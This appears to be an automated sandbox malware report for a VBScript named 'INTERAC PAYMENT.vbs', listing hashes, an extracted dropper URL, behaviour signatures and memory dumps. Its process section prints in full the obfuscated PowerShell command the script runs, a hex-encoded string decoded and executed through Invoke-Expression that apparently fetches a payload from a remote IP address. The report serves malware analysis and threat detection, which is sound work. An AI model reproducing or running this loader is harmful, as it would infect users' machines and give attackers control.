INTERAC PAYMENT.vbs

General
Target

INTERAC PAYMENT.vbs

Filesize

7KB

Completed

20-09-2021 18:27

Score
10 /10
MD5

f3bc5f7625cfb7d4f44f784561b05faf

SHA1

8831e8de10c1365cbc23bf50b96b6292fd09af29

SHA256

9b08fe9109b0e4b68f52624894d0ea9261f4a434f07d022f2d2b2d7c12877460

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://13.112.210.240/NJNJNJNJbypass.txt

Signatures 4

Filter: none

Discovery
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pidprocess
    1580powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1580powershell.exe
  • Suspicious use of WriteProcessMemory
    WScript.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1424 wrote to memory of 15801424WScript.exepowershell.exe
    PID 1424 wrote to memory of 15801424WScript.exepowershell.exe
    PID 1424 wrote to memory of 15801424WScript.exepowershell.exe
Processes 2
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INTERAC PAYMENT.vbs"
    Suspicious use of WriteProcessMemory
    PID:1424
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://13HHHHHHHHHHHHH112HHHHHHHHHHHHH210HHHHHHHHHHHHH240/NJNJNJNJbypassHHHHHHHHHHHHHtxt'.Replace('HHHHHHHHHHHHH','.');$SOS='%!HHHHHHHHHHH!5HHHHHHHHHHH!!HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH!dHHHHHHHHHHH!bHHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH*eHHHHHHHHHHH!5HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH!5HHHHHHHHHHH*%HHHHHHHHHHH!3HHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH5!HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH7!HHHHHHHHHHH%eHHHHHHHHHHH57HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH*cHHHHHHHHHHH!9HHHHHHHHHHH!5HHHHHHHHHHH!eHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH!bHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH!!HHHHHHHHHHH!fHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH*1HHHHHHHHHHH!!HHHHHHHHHHH53HHHHHHHHHHH5!HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH!7HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH57HHHHHHHHHHH*eHHHHHHHHHHH!cHHHHHHHHHHH*fHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH7%HHHHHHHHHHH!9HHHHHHHHHHH*eHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH57HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!3HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH59HHHHHHHHHHH!8HHHHHHHHHHH55HHHHHHHHHHH!aHHHHHHHHHHH!9HHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH*0HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%8HHHHHHHHHHH*eHHHHHHHHHHH*0HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH*0HHHHHHHHHHH*3HHHHHHHHHHH*0HHHHHHHHHHH5!HHHHHHHHHHH%0HHHHHHHHHHH%!HHHHHHHHHHH!5HHHHHHHHHHH!!HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH!dHHHHHHHHHHH!bHHHHHHHHHHH!!HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH%9HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH*5HHHHHHHHHHH*0HHHHHHHHHHH57HHHHHHHHHHH*0HHHHHHHHHHH%dHHHHHHHHHHH!fHHHHHHHHHHH*%HHHHHHHHHHH*aHHHHHHHHHHH*0HHHHHHHHHHH!5HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH!bHHHHHHHHHHH%8HHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH5aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%*HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%8HHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH57HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!3HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH59HHHHHHHHHHH!8HHHHHHHHHHH55HHHHHHHHHHH!aHHHHHHHHHHH!9HHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH%dHHHHHHHHHHH!aHHHHHHHHHHH*fHHHHHHHHHHH*9HHHHHHHHHHH*eHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH7cHHHHHHHHHHH%*HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split 'HHHHHHHHHHH' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1580
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Persistence
                      Privilege Escalation
                        Replay Monitor
                        00:00 00:00
                        Downloads
                        • memory/1424-53-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp

                        • memory/1580-54-0x0000000000000000-mapping.dmp

                        • memory/1580-56-0x000007FEF1FC0000-0x000007FEF2B1D000-memory.dmp

                        • memory/1580-59-0x0000000002584000-0x0000000002587000-memory.dmp

                        • memory/1580-60-0x000000000258B000-0x00000000025AA000-memory.dmp

                        • memory/1580-58-0x0000000002582000-0x0000000002584000-memory.dmp

                        • memory/1580-57-0x0000000002580000-0x0000000002582000-memory.dmp